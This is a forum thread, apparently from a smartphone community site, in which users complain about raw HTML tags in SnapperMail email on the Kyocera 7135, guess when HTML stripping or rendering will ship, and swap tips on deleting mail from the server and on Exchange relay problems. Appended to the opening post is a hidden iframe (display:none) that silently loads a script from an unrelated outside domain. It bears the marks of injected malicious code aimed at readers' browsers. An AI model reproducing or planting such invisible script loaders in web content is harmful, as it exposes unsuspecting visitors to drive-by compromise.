+ Reply to Thread

Snappermail and HTML

I like Snappermail a lot for the 7135 but it seems almost 90 percent of the email I get these days is HTML and the HTML tags are driving me crazy. Sometimes I have to go through 3 screens worth to get to something that I can read.

Is there must be something in the Eudora browser that filters all those thing out or am I not remembering.

Is there a way to filter all that crap out in Snappermail I'm missing?

Or do I just have to live with this until someone (including Snappermail) figures out HTML email?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

HTML support is something that SnapperMail should support in the near future (according to things I've read on their Yahoo group, and from e-mail responses I've gotten back from Will Lau). That's something I'm really looking forward to also.
    Please visit my picture site: Robert-O-Rama :)

I could be totally wrong about this, but...

Go into Snappermail.
    Open up an email that you have received.
    See the three little boxes in the upper-right-hand corner of the screen?
    Tap on each of those to see the different viewing/display options.
    Doesn't this clear up the problem you described?
    ~'kito
    pdaPhoneHome Moderator

As noted in the Yahoo group on snappermail, this will be offered in the very next version of snappermail. Since it's been more than a couple weeks since the last version, my guess is that the beta (for registered users) should be out soon. Snappermail is great, but I agree it will be much improved with HTML stripping.

Originally posted by Markito

Go into Snappermail.
    Nope! That just lets you view additional header information

It will be great to have html support... I just hope we can choose which browser is used!

Originally posted by pdadoc
    As noted in the Yahoo group on snappermail, this will be offered in the very next version of snappermail. Since it's been more than a couple weeks since the last version, my guess is that the beta (for registered users) should be out soon. Snappermail is great, but I agree it will be much improved with HTML stripping.
    But will it be stripping or rendering. Will Lau seems to be hedging this one. For many moons, the talk was stripping, but the conversation swayed toward rendering. I am not sure where it stands as of right now.

SM 1.7 should be out my month's end. I can't wait. For folks who are not familiar with this program, it is the best email program going. Support large emails, attachments, etc. In the near future, it suppose to do conduits to your PC mail. We'll see...

--John

True- i've seen that discussion.... Frankly, while some minor rendering would be great (eg, bold, underline, italics), I'm also in the camp of mainly just wanting to get rid of all those html tags. Whatever way they go, it will be a solid step forward...

Originally posted by zucchero
    SM 1.7 should be out my month's end. I can't wait. For folks who are not familiar with this program, it is the best email program going. Support large emails, attachments, etc. In the near future, it suppose to do conduits to your PC mail. We'll see...
    I agree... I think that SnapperMail is one of the "must have" apps for a smartphone, and particularly the 7135 (because the SD slot).

What I am primarily looking for with HTML support is the ability to tap on embedded URL's and launch a browser to open the site. The impression I got in my response from Will Lau regarding this was that the plan was to add that functionality... but that was 6-8 weeks ago.

Originally posted by Robert K.
    I agree... I think that SnapperMail is one of the "must have" apps for a smartphone, and particularly the 7135
    Will SnapperMail allow me to delete from my server, or at least not download headers for email I've already viewed? I can't seem to get Mobile Mail to actually delete or stop resending me old mail. Any thoughts or suggestions?

Originally posted by The Larch
    Will SnapperMail allow me to delete from my server, or at least not download headers for email I've already viewed? I can't seem to get Mobile Mail to actually delete or stop resending me old mail. Any thoughts or suggestions?
    SnapperMail will allow you to delete e-mail from the server (in a variety of different ways!). It can't tell what you have already viewed on your desktop computer (unless it has also been downloaded by Snapper)... the conduits feature for Outlook is supposed to be coming in a future release though. My current system is to have my work computer delete e-mail from the server after 1 day, and when emptied from the deleted items folder. At the end of my day at work I empty deleted items, and starting at 6:30 p.m. SnapperMail does periodic fetches every 15 minutes until 11:55 p.m. (on the weekends I set it to start at 7:30 a.m.). I also have SnapperMail set to only retrieve the first 20 lines of the e-mail (which speeds up downloading significantly), and if I want to see the entire e-mail I just flag that particular e-mail to be fully retrieved next time it checks.

Originally posted by Markito

Go into Snappermail.
    Thanks Mark, but no, I already tried it, it just eliminates some of the header, stuff, etc. but there is still an abundance of html tags.

Originally posted by Robert K.
    SnapperMail will allow you to delete e-mail from the server (in a variety of different ways!). It can't tell what you have already viewed on your desktop computer (unless it has also been downloaded by Snapper)... the conduits feature for Outlook is supposed to be coming in a future release though. My current system is to have my work computer delete e-mail from the server after 1 day, and when emptied from the deleted items folder. At the end of my day at work I empty deleted items, and starting at 6:30 p.m. SnapperMail does periodic fetches every 15 minutes until 11:55 p.m. (on the weekends I set it to start at 7:30 a.m.). I also have SnapperMail set to only retrieve the first 20 lines of the e-mail (which speeds up downloading significantly), and if I want to see the entire e-mail I just flag that particular e-mail to be fully retrieved next time it checks.
    Robert

So can I assume what Eurdora does is "strip" right? I like Snappermail alot to, I wish they'd hurry this final change though.

I liked SnapperMail too, however, it does not allow me to send from my 7135 through the Microsoft Exchange server (relay). In other words, SnapperMail won't allow me to reply to a message with my work e-mail as the return address.

Verizon is supposed to bundle a new or updated email program with the 7135 "soon" that will allow users to do the above.

Malcolm

snappermail - NO

I sure hope they release HTML/or Strip ability SOON! It's just about unusable as it stands with the email I get. I spend more time searching for the email than reading it.

Is there another email program that will do Timed email fetches and strips the html?

I had the 'Relay' problem with Snappermail and Exchange too.